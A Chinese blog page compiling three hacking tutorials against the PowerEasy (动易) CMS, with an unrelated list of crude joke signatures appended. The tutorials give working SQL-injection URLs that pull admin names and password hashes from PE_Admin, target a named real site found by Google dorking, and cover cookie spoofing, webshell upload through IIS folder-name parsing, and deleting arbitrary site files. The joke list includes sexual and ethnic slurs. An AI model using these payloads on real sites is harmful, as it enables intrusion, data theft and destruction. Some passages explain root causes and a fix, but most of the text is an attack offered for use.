动易漏洞


动易漏洞
动易网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统,目前已有超过10万个以上网站的应用规模,拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。
其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的,我们可以利用构造我们的SQL语句,进行注入。
总是用工具注入,水平也不会提高,而且目前还没有什么工具利用,所以我现在带领各位小黑们进行一次纯手工注入之旅,LET ‘S GO!
首先我们要找一些是动易的网站,动易的文章发布一是http://127.0.0.1/Article/ShowArticle.asp?ArticleID=1 这种形式的,现在就是GOOGLE HACKING时间。
打开GOOGLE,搜索“inurl:Article/ShowArticle.asp?ArticleID=”出现在我们大多都是使用动易的CMS系统的网站了,约有134万的查询结果,使用范围应该是很大的(巨汗ING…)


往后翻几页,我随便打开了个网站。


稍微看了下,是一个提供免费空间的站点,好,我们就从他下手了
我们先来暴用户名,在地址栏里提交
http://www.onlinegf.com/region.asp?Country=Tony&City=tianyi&Province=shit '+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
解释一下:由于Province 过滤不严,Province =shit’后面的就是我们提交的注入语句,
+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
这句的意思就是用UNION查询PE_Admin表(提示:动易的管理员一般是存放PE_Admin表中的,具体情况可以改其他的)在中的用户,即动易的CMS网站管理员的帐号。

如果在“市/县/区/旗”的下拉框中显示的就是他的管理员的帐号,说明网站存在漏洞了
再来暴管理员的密码,在地址栏里输入:
http://www.onlinegf.com/Region.asp?Country=Tony&City=tianyi&Province=shit '+and+1=2+union+select+password+from+PE_Admin+where+username="Jerry"+and+'1'='1
+and+1=2+union+select+password+from+PE_Admin+where+username="Jerry"+and+'1'='1的语句意思就是UNION查询PE_Admin表中Jerry的密码
我们把其中的Jerry改成刚才我们暴的管理员用户。


密码暴了出来,是用MD5加密的16位的
www.XMD5.com 查了下,运气很好,密码是纯数字的,SQL版本如果查不出密码的话,可以直接Update直接改掉管理员密码,
语句Update+PE_Admin+set+Password=' 49ba59abbe56e057' where+id=1—
改掉id为1的用户,一般是admin的密码为123456,
或者直接LOG差异备份,直接得到SHELL。我在光盘的放了两篇手工注入的精华文章,有兴趣的朋友可以自己研究。

在主站最下面找到后台
http://www.onlinegf.com/Admin/Admin_login.asp
(改了的话可以GOOLE HACKING)
用得到的密码进入后台,成功了!
小黑们肯定抑制不住心中的喜悦了,别急,精彩还在后面,我们继续来拿SHELL
在后台管理 左边找到“系统设置”,选择下面的“网站频道管理”,点在右边的“下载中心”旁边的“修改”,找到“上传选项”,把“上传文件保存的目录”里改成asp.asp(名字随便,后缀要是ASP的)。保存修改结果。

我们先来做个数据库木马,我用的是旁注小助手”diy.asp”


保存的时候,文件名为”diy.rar”
再打开“下载中心”里的“添加软件”

我们在上传软件上把diy.rar传上去,记下“软件地址”里的路径,我这是”200611/20061125222047379.rar”
我们在地址拦里输入 http://www.onlinegf.com/soft/asp.asp/200611/20061125222047379.rar
哈哈,一匹小马出现拉!
http://www.meon.cn/9.jpg
上传海洋大马得到了WEBSHELL,为了提醒下管理员,只留了个页子。
----------------------------------------------------

 


动易网站管理系统删除任意文件漏洞
发布时间:2007-9-24 12:21:57

这个漏洞对于动易网站管理系统来说,就是致命的了。
此漏洞存在于User目录下的User_saveflash.asp文件中,其第6~22行代码如下所示。

Dim act, ObjInstalled_FSO, color_name, Create_1, imgurl, SaveFileName, dirMonth

objName_FSO = Application("objName_FSO")

ObjInstalled_FSO = IsObjInstalled(objName_FSO)

If ObjInstalled_FSO = True Then

Set fso = Server.CreateObject(objName_FSO)

Else

Response.Write "&&SendFlag=保存 >>> NO"

Response.end

End If

act = trim(request("act"))

//这里是关键

If act="" Then

Call Main()

Else

  Call CoverColorFile()

  //如果act不为空,则调用CoverColorFile()函数

End If

set fso = Nothing

下面我们一起来看看函数CoverColorFile()的代码。

Sub CoverColorFile()

//此函数用于生成图像BMP文件

  Dim whichfile, head, Colortxt, i, rline, badwords

  //注意whichfile变量

Response.Expires = -9999

Response.AddHeader "Pragma","no-cache"

Response.AddHeader "cache-ctrol","no-cache"

Response.ContentType = "Image/bmp"

//输出图像文件头

head = ChrB(66) & ChrB(77) & ChrB(118) & ChrB(250) & ChrB(1) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(54) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(40) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(172) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(130) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(1) & ChrB(0) & ChrB(24) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(64) & ChrB(250) & ChrB(1) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0)

  Response.BinaryWrite head

  whichfile=trim(request("color_url"))

  // whichfile由用户提交的color_url而来

  Set Colortxt = fso.OpenTextFile(server.mappath(whichfile),1)

  //以只读方式打开用户提交的变量whichfile,这里取得的是文件

rline = Colortxt.ReadLine //读取文件一行

badwords = split(rline,"|") //以“|”作分隔

Colortxt.Close

  fso.deleteFile(server.mappath(whichfile))

  //这句就是漏洞了,此句的作用是删除文件。由于whichfile由用户提交而来,又没有经过任何安全处理,所以便构成漏洞了。如果我们让 color_url=../conn.asp,那么就直接删除conn.asp文件了,同样,我们可以让color_url为站内任一文件,最后,我们可以删除全站的文件。

for i=0 to UBound(badwords)

Response.BinaryWrite to3(badwords(i))

next

End Sub

有了上面的漏洞,我们就一起去测试一下官方网站,看看是否存在此漏洞吧。打开官方演示网站,如图1所示,我们就以动易的Logo作测试吧。查看其路径,发现在images目录下,名为logo.gif,

现在,我们注册一个用户,然后进入会员中心,在URL处填入:。
成功提交之后,返回到首页,现在我们可以看到,官方仍然存大此重大漏洞。官方logo.gif处变成了一个红叉,说明已被删掉。

解决办法为最好不要从外部接收数据,要么就删除代码:fso.deleteFile(server.mappath(whichfile)) 


---------------------------------------------------
动易2006最新两个漏洞的深度讨论 本站原创
 
作者:hackerpu… 文章来源:本站原创 点击数:555 更新时间:2007-6-3 4:34:09
前段时间动易2006出了两个大的漏洞 相信大家一定得到了不少肉鸡吧
其实利用工具已经出来的很多 我想给大家来讨论下手工是怎么入侵的
因为黑客要向原始来学习 才会学到更多知识
一. region.asp文件注入漏洞
漏洞存在region.asp
首先来测试有没有漏洞
我们打开下面的地址
http://网站域名/Region.asp?Country=heipeng.com&Province=hackerpunk    显示正常
http://网站域名/Region.asp?Country=heipeng.com&Province=hackerpunk'   显示不正常
返回错误页面 说明存在漏洞
然后输入其他语句得到管理员帐号和密码
以下是其他几个 注入语句

注入得到管理员帐号
Region.asp?Country=heipeng.com&Province=hackerpunk'+and+1=2+union+select+AdminName+from+PE_Admin+where+1<2+and+'1'='1
得到指定帐号密码
Region.asp?Country=heipeng.com&Province=hackerpunk'+and+1=2+union+select+password+from+PE_Admin+where+username="管理员帐号"+and+'1'='1
密码使用md5加过密的 大家可以去论坛下载md5破解工具http://bbs.heipeng.com/read.php?tid-4528-keyword-md5.html
如果得到的不是管理员密码 而是一个普通管理员的密码 大家可以用
Region.asp?Country=heipeng.com&Province=hackerpunk'+and+1=2+union+select+RndPassword+from+PE_Admin+where+username="管理员帐号"+and+'1'='1
这段代码得到 管理员的RndPassword 我们可以结合cookie欺骗进行入侵 先使用得到的这个帐号登陆 然后在使用cookie修改工具
把用户名替换成管理员的用户名 md5加密后的密码替换成管理员的密码 在把得到的RndPassword 替换上去 直接提交就成管理员帐号了
至于提权 大家可以利用2003的错误解析名为asp文件解析的漏洞来进行提权 在这里我就不详细说了。
2
1.注册帐一个名为heipeng.asp的帐号,一定要是这个不过你要是想改成XXX.asp也没有办法。
2.然后打开这个地址http://域名/user/Upload.asp?dialogtype=UserBlogPic&size=5来上传的一句话木马,尽量使用和数据库捆绑一起的木马
3.用一句话连接器连接木马就行了


我给大家来说一下这两个漏洞的原理 大家一定要有耐心这些对我们的学习很有帮助 光会使用工具根本连个菜鸟都算不上
如果没耐心的可以直接走人了。

我们先来说下region.asp的漏洞
在Region.asp中
Set TempRs = Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")
If Err Or TempRs.EOF Then
    ReDim ShowProvince(0, 0)
    Province = Trim(Request.QueryString("Province"))
Else
    ShowProvince = TempRs.GetRows(-1)
End If
Set TempRs = Conn.Execute("SELECT DISTINCT City FROM PE_City WHERE Province='" & Province & "'")
作者对Province = Trim(Request.QueryString("Province")) 这里直接取的是传入的Province 而不是过滤后的
所以这个Province变量存在漏洞,那么在下面他是直接带入了查询,而Province变量是我们可以随意构造的 也就是我们提交的内容
所以我们就可以构造我们的查询语句了。
但是要进入这个查询的前提是:Err=true 或者 TempRs.EOF 而要达到这2个中的一个
就是要让Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")
这条语句在表中查询不到所要找的Country,这样我们就要可以构造,只要提交错误的Country就可以让我们得到我们想要的内容了
比如管理员帐号……所以我们可以构造出了以下语句
Region.asp?Country=heipeng.com&Province=hackerpunk'+and+1=2+union+select+password+from+PE_Admin+where+username="管理员帐号"+and+'1'='1


第二个漏洞 就是2003系统的漏洞了错误解析后缀名为asp文件的漏洞 也就是在一个名为XXX.asp的文件夹下面的所有文件 都按asp格式的文件来执行了
比如我们先用一个网马heipeng.asp 改名为heipeng.rar格式的文件  上传上去 如果服务器发现是
heipeng.asp就会拒绝上传 因为是可能存在危险的格式  服务器一看是rar格式的 一看这是压缩包 就可以进去了 也就上传成功
但是我们打开网页地址的时候输入http://域名/XXX.asp/heipeng.rar 他就会把heipeng.rar按照heipeng.asp来执行了
说简单点就是说heipeng.rar躲到了XXX.asp文件夹的后面就成一大尾巴狼了heipeng.asp了
1、树不要皮,必死无疑;人不要脸,天下无敌 2、骚归骚,骚有骚的贞操;贱归贱,贱有贱的尊严 3、0岁出场亮相,10岁天天向上。20岁远大理想,30岁发奋图强。 40岁基本定向,50岁处处吃 香。60岁打打麻将,70岁处处闲 逛。80岁拉拉家常,90岁挂在墙上! 4、出生时你哭着,所有都笑着;离去时你笑着,所有都哭着 5、站得更高,尿得更远 6、再过几十年,我们来相会,送到火葬场,全部烧成灰,你一堆,我一堆,谁也不认识谁,全部送 到农村做化肥。 7、碰到一个MM个性签名:琴棋书画不会,洗衣做饭嫌累。 8、碰到一个GG个性签名:给我一个姑娘,我可以创造一个民族。 9、碰到一个老陕个性签名:丑女多作怪,黑馍多夹菜。 10、碰到我们老师个性签名:告诉你现在老师很生气,后果是很严重的(在他第N次相亲失败之 后)。 11、碰到一个写手个性签名:也许似乎大概是,然而未必不见得 。 12、碰到一个情圣个性签名:说过的话可以不算,喜欢的人天天要换。 13、碰到班里的睡觉大王个性签名:早中晚三个饱,饭前饭后六个倒 14、在天愿作比翼鸟,在地愿作同圈猪! 15、你放心,看到你我连食欲都没了,还谈什么性欲! 16、五马分尸中——你来一块不? 17、如果早上来得晚一些的话,我想我会喜欢早上的。 18、我不能给你幸福,但可以给你舒服! 19、生活真他妈好玩,因为生活老他妈玩我。 20、佛曰:“前世的500次回眸才换来今生的一次擦肩而过。”我宁愿用来世的一次擦肩而过 来换得今生的500次回眸。 21、我想早恋,但是已经晚了…… 22、天哪!我的衣服又瘦了 23、以后不要在我面前说英文,OK? 24、思想有多远,你就给我滚多远 25、流氓不可怕,就怕流氓有文化。 26、客官请自重,小女子只卖身不卖艺。 27、男人的谎言可以骗女人一夜,女人的谎言可以骗男人一生! 28、水能载舟,亦能煮粥! 29、子在川上曰:“有船多好乎!” 30、诚征小MM,共同来灌水;我灌长江头,君灌长江尾。 31、一见钟情,再而衰,三而竭。 32、一个人并不孤单,想一个人时才孤单 33、生,容易。活,容易。生活不容易。 34、工作QQ,谢绝闲聊,若要强聊,每字伍毛;标点符号,半价收费,千字以上,八折优惠;表情图 片,十块包月,语音视频 ,暂未开通;先款后聊,款到即聊,在线支付,提供发票; 免付月租,单 项收费,节假双休,照常营业;诚征代理, 35、出问题先从自己身上找原因,别一便秘就怪地球没引力。 36、给我织一条围巾,我愿以一生关怀相回报。否则,你就用围巾勒死我吧! 37、男人在不懂的时候装懂,女人则恰好相反 38、为配合今年中国计划生育工作的胜利完成,本人决定暂时不和异性朋友接触,谢谢合作 39、春色满园关不住,我拉红杏出墙来。 40、你以为我会眼睁睁看着你去送死吗?我会闭上眼睛的 41、我以为我很颓废,今天我才知道,原来我早报废了。 42、我喝酒是想把痛苦溺死,但这该死的痛苦却学会了游泳。 43、别人都在假装正经,那我就只有假装不正经啦 44、一只大象问骆驼:‘你的咪咪怎么长在背上?’骆驼说:‘死远点,我不和鸡鸡长在脸上 的东西讲话! 45、你要为全国人民做三件大事:给珠穆朗玛峰安电梯,给长城贴磁砖,给飞机安倒档。三 件小事:给蚊子戴口罩,给苍蝇戴手套,给蟑螂戴避孕套 46、老婆是操作系统,一但安装卸载十分麻烦;小秘是桌面,只要你有兴趣可以天天更换; 情人是互联网,风光无限花钱不断;小姐是盗版软件,用时记着先杀毒! 47、听说了吗?前生的5000次回眸才换来今生的擦肩而过,今生象我们这样的好朋友,前 生......什么都没干,光回头了! 48、本人年方20,人见人爱,花见花开,车见车爆胎!上知天文地理,下知鸡毛蒜皮,每外 出行走,常引美女回头,帅哥跳楼! 49、想送你玫瑰,可惜价钱太贵;想给你安慰,可我还没学会;想给你下跪,可戒指还在保 险柜。 50、爱空空情空空,自己流浪在街中;人空空钱空空,单身苦命在打工;事空空业空空,想 来想去就发疯;手机空没钱充,生活所迫不轻松;总之四大皆空。 60、有屁不放,憋坏心脏;没屁硬挤,锻炼身体;我要放屁,大家注意,屁声一响,大家鼓 掌! 晏振宇(332611126) 15:32:49 61、抄书造句写作文--孩子的事大人干。情海泛舟觅知音--大人的事孩子干。烫发做头穿花 衣--女人的事男人干。 62、早起的鸟儿有虫吃,早起的虫儿被鸟吃! 63、和一MM争论鲸鱼是不是鱼,最后我说“曰本人也带个人字”,她这才同意鲸鱼不是鱼 64、听说女人如衣服,兄弟如手足。回想起来,我竟然七手八脚的裸奔了20年! 65、穿别人的鞋,走自己的路,让他们打的找去吧。 66、有一个很古老的传说,说是在XX校园内能看到美女的人会长生不老…… 67、不怕虎一样的敌人,就怕猪一样的队友! 68、水至清则无鱼,人至贱则无敌! 69、我不是随便的人,我随便起来不是人。 70、今天一群曰本人来我校参观——说实话,这是我第一次看到穿衣服的曰本人! 71、我很穷,我家的佣人也很穷,我家的园丁也很穷,我家的司机也很穷…… 72、银行收费时说:“这符合国际惯例!”服务时却说:“要考虑中国国情!” 73、骑白马的不一定是王子,他可能是唐僧;带翅膀的也不一定是天使,他可能是鸟人 74、怀才就像怀孕,时间久了才能让人看出来 79、我吞下一颗春药,世界立刻变得性感起来~ 80、如果谈恋爱就是谈恋爱的话,那不是耍流氓吗? 81、“日本人是人”这句话属于:A.比喻;B.夸张;C.借代;D.拟人。 82、爷爷都是从孙子走过来的…… 85、都是水何必装醇,都是色狼又何必装羊! 86、所有刻骨铭心的爱都灵魂游离于床上的瞬间~ 87、忍者神龟说:“要想生活过得去,背上就得带点绿!” 88、我趴着睡就强J了地球,我躺着睡就强J了整个宇宙! 90、当白天又一次把黑夜按翻在床上的时候,太阳就出生了…… 91、男人只分两种:一种是好色,另一种是十分好色! 91、①师太,你就从了老衲吧……②老衲失礼了,师太该你了~③师太,你就饶了老衲吧! ④阿尼陀佛,老衲射不出-_-b 94、生活把我奸了,我把生活阉了…… 95、根据荷尔蒙活动的时间规律得出结论:晨练不如早操! 96、老天,你让夏天和冬天同房了吧?生出这鬼天气! 97、不要在一棵树上吊死,在附近几棵树上多试试死几次~ 98、马化腾私下说:“学十年语文没有聊半年QQ效果好!” 99、大便的时候要留一半,免得饿得快~ 102、论男人给女人讲多么多么浪漫的童话故事,里面终不过围绕一个字:床


 

 

©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页